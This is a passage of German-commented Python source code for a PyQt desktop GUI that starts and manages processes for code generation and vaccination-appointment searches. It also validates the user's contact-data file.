if get_current_version() != 'source':
title = "Alte Version!"
text = "Bitte Update installieren"
info_text = f"Die Terminsuche funktioniert möglicherweise nicht, da du eine alte Version verwendest ({get_current_version()})"
else:
title = "Sourcecode"
text = "Updateprüfung nicht möglich!"
info_text = "Du benutzt die nicht paketierten Skripte von Github. Die Terminsuche funktioniert möglicherweise nicht, da die Version veraltet sein könnten."
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.information)
msg.setWindowTitle(title)
msg.setText(text)
msg.setInformativeText(info_text)
msg.addButton(msg.Close)
btn_download = msg.addButton("Download", msg.ApplyRole)
btn_download.clicked.connect(lambda: open_browser(url))
msg.exec_()
except Exception as error:
# warum auch immer konnte nicht überprüft werden
# einfach nichts machen
pass
def __code_generieren(self):
"""
Startet den Prozess der Codegenerierung
Codegenerierung ohne interaktive Eingabe der Kontaktdaten
:param kontaktdaten: Dictionary mit Kontaktdaten
"""
try:
kontaktdaten = self.__get_kontaktdaten(Modus.CODE_GENERIEREN)
#return if no data was returned
if not kontaktdaten:
return
except FileNotFoundError as error:
QtWidgets.QMessageBox.critical(self, "Datei nicht gefunden!", f"Datei zum Laden konnte nicht gefunden werden\n\nBitte erstellen")
return
except ValidationError as error:
QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei sind Fehler:\n\n{error}")
return
except MissingValuesError as error:
QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei Fehlen Daten:\n\n{error}")
return
strProcName = "Codegen"
# allow only 1 Code Gen at a time
for subProvess in self.such_prozesse:
if subProvess.name == strProcName:
QtWidgets.QMessageBox.information(self, "STOP", "Es läuft bereits eine Codegenerierung!")
return False
#start codegen process
code_prozess = multiprocessing.Process(target=QtCodeGen.start_code_gen,
name=strProcName, daemon=True, kwargs={
"kontaktdaten": kontaktdaten,
"ROOT_PATH": PATH
})
#add code search to list of prozesses
try:
code_prozess.start()
if not code_prozess.is_alive():
raise RuntimeError(
f"Code suche wurde gestartet, lebt aber nicht mehr!"
)
except Exception as error:
QtWidgets.QMessageBox.critical(self, "Fehler - Codegenerierung nicht gestartet!", str(error))
else:
self.such_prozesse.append(code_prozess)
self.__add_prozess_in_gui(code_prozess)
self.prozesse_counter += 1
def __termin_suchen(self):
"""
Startet den Prozess der terminsuche mit Impfterminservice.terminsuche in einem neuen Thread
Dieser wird in self.such_threads hinzugefügt.
Alle Threads sind deamon Thread (Sofort töten sobald der Bot beendet wird)
"""
try:
kontaktdaten = self.__get_kontaktdaten(Modus.TERMIN_SUCHEN)
if not kontaktdaten:
return
zeitrahmen = kontaktdaten["zeitrahmen"]
except FileNotFoundError as error:
QtWidgets.QMessageBox.critical(self, "Datei nicht gefunden!", f"Datei zum Laden konnte nicht gefunden werden\n\nBitte erstellen")
return
except ValidationError as error:
QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei sind Fehler:\n\n{error}")
return
except MissingValuesError as error:
QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei Fehlen Daten:\n\n{error}")
return
self.__start_terminsuche(kontaktdaten, zeitrahmen)
def __start_terminsuche(self, kontaktdaten: dict, zeitrahmen: dict):
"""
Startet die Terminsuche. Dies nur mit einem Thread starten, da die GUI sonst hängt
Args:
kontaktdaten (dict): kontakdaten aus kontaktdaten.json
zeitrahmen (dict): zeitrahmen aus zeitrahmen.json
"""
check_delay = self.i_interval.value()
codes = kontaktdaten["codes"]
terminsuche_prozess = multiprocessing.Process(target=QtTerminsuche.start_suche, name=f"{codes[0]}-{self.prozesse_counter}", daemon=True, kwargs={
"kontaktdaten": kontaktdaten,
"zeitrahmen": zeitrahmen,
"ROOT_PATH": PATH,
"check_delay": check_delay})
try:
terminsuche_prozess.start()
if not terminsuche_prozess.is_alive():
raise RuntimeError(
f"Terminsuche wurde gestartet, lebt aber nicht mehr!\n\nTermin mit Code: {terminsuche_prozess.getName()}\nBitte Daten Prüfen!"
)
except Exception as error:
QtWidgets.QMessageBox.critical(self, "Fehler - Suche nicht gestartet!", str(error))
else:
# QtWidgets.QMessageBox.information(self, "Suche gestartet", "Terminsuche wurde gestartet!\nWeitere Infos in der Konsole")
self.such_prozesse.append(terminsuche_prozess)
self.__add_prozess_in_gui(terminsuche_prozess)
self.prozesse_counter += 1
def __update_kontaktdaten_pfad(self, pfad: str):
"""
Holt sich mithilfe des QFileDialogs eine bereits vorhandene Datei.
Dieser Pfad wird in der GUI ersetzt und im Attribut der Kasse gespeichert.
Wird ein Pfad bereits mit übergeben, wird dieser verwendet
Args:
pfad (str): if pfad - dann Wert übernehmen
"""
if pfad:
self.pfad_kontaktdaten = pfad
else:
try:
pfad = oeffne_file_dialog_select(self, "Kontakdaten", self.pfad_kontaktdaten)
except FileNotFoundError:
return
self.pfad_kontaktdaten = pfad
self.i_kontaktdaten_pfad.setText(self.pfad_kontaktdaten)
def __add_prozess_in_gui(self, prozess: multiprocessing.Process):
"""
Die Prozesse werden in der GUI in dem prozesse_layout angezeigt
"""
label = QtWidgets.QLabel(f"Prozess: {prozess.name}")
button = QtWidgets.QPushButton("Stoppen")
button.setObjectName(prozess.name)
button.clicked.connect(lambda: self.__stop_prozess(prozess))
self.prozesse_layout.addRow(label, button)
def __stop_prozess(self, prozess: multiprocessing.Process):
"""
Stopped den übergebenen Prozess und löscht diesen aus der GUI
Args:
prozess (multiprocessing.Process): Prozess welcher getötet werden soll
"""
prozess.kill()
self.such_prozesse.remove(prozess)
self.__remove_prozess_von_gui(prozess)
def __remove_prozess_von_gui(self, prozess: multiprocessing.Process):
"""
Entfernt die Anzeige des Prozesses aus der GUI
Args:
prozess (multiprocessing.Process): Prozess welcher entfernt werden soll
warnung (bool, optional): Warnung an den User ausgeben, dass der Prozess weg ist. Defaults to False.
"""
button = self.findChild(QtWidgets.QPushButton, prozess.name)
self.prozesse_layout.removeRow(button)
def __check_status_der_prozesse(self):
"""
Wird von einem Thread dauerhaft durchlaufen um zu prüfen ob ein Prozess sich beendet hat
"""
while True:
for prozess in self.such_prozesse:
if not prozess.is_alive():
self.__remove_prozess_von_gui(prozess)
self.such_prozesse.remove(prozess)
time.sleep(1.5)
def __check_old_kontakt_version(self, kontaktdaten: dict = None) -> bool:
"""
Schaut ob zeitspanne.json vorhanden ist - wenn ja löschen und Warnung ausgeben
Schaut ob ["zeitrahmen"] in den Kontakdaten ist - wenn ja Warnung ausgeben
Args:
kontaktdaten (dict, optional): Kontakdaten wo geladen werden. Defaults to None.
Returns:
bool: Alte Version -> False; Alles richtig -> True
"""
if kontaktdaten:
try:
kontaktdaten["zeitrahmen"]
return True
except KeyError as error:
# Zeitrahmen nicht vorhanden - Warnung ausgeben
pass
else:
# Prüfen ob alte Datei vorhanden ist - ggf. löschen
old_zeitrahmen_path = os.path.join(PATH, "data", "zeitspanne.json")
if os.path.isfile(old_zeitrahmen_path):
os.remove(old_zeitrahmen_path)
else:
return True
QtWidgets.QMessageBox.critical(self, "Alte Version von Kontaktdaten!",
"Die Kontakdaten scheinen von einer älteren Version zu sein.\nKontakdaten und Zeitspanne sind nun in einer Datei.\n\nBitte Datei neu erstellen!")
return False
##############################
# Kontaktdaten #
##############################
def kontaktdaten_erstellen(self, modus: Modus = Modus.TERMIN_SUCHEN):
"""
Ruft den Dialog für die Kontaktdaten auf
Args:
modus (Modus): Abhängig vom Modus werden nicht alle Daten benötigt. Defalut TERMIN_SUCHEN
"""
dialog = QtKontakt(self, modus, self.pfad_kontaktdaten, PATH)
dialog.update_path.connect(self.__update_kontaktdaten_pfad)
dialog.show()
dialog.exec_()
def __get_kontaktdaten(self, modus: Modus) -> dict:
"""
Ladet die Kontakdaten aus dem in der GUI hinterlegten Pfad
Args:
modus (Modus): Abhängig vom Modus werden nicht alle Daten benötigt.
Returns:
dict: Kontakdaten
"""
if not os.path.isfile(self.pfad_kontaktdaten):
self.kontaktdaten_erstellen(modus)
kontaktdaten = kontak_tools.get_kontaktdaten(self.pfad_kontaktdaten)
kontak_tools.check_kontaktdaten(kontaktdaten, modus)
if modus == Modus.TERMIN_SUCHEN:
if not self.__check_old_kontakt_version(kontaktdaten):
raise ValidationError("\"zeitrahmen\" fehlt -> Alte Version")
if "codes" in kontaktdaten:
if "XXXX-XXXX-XXXX" in kontaktdaten["codes"]:
raise ValidationError("Der Code is ungültig. Bitte trage einen korrekten Code ein!")
return kontaktdaten
def main():
"""
Startet die GUI-Anwendung
"""
multiprocessing.freeze_support()
HauptGUI.start_gui()
if __name__ == "__main__":
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.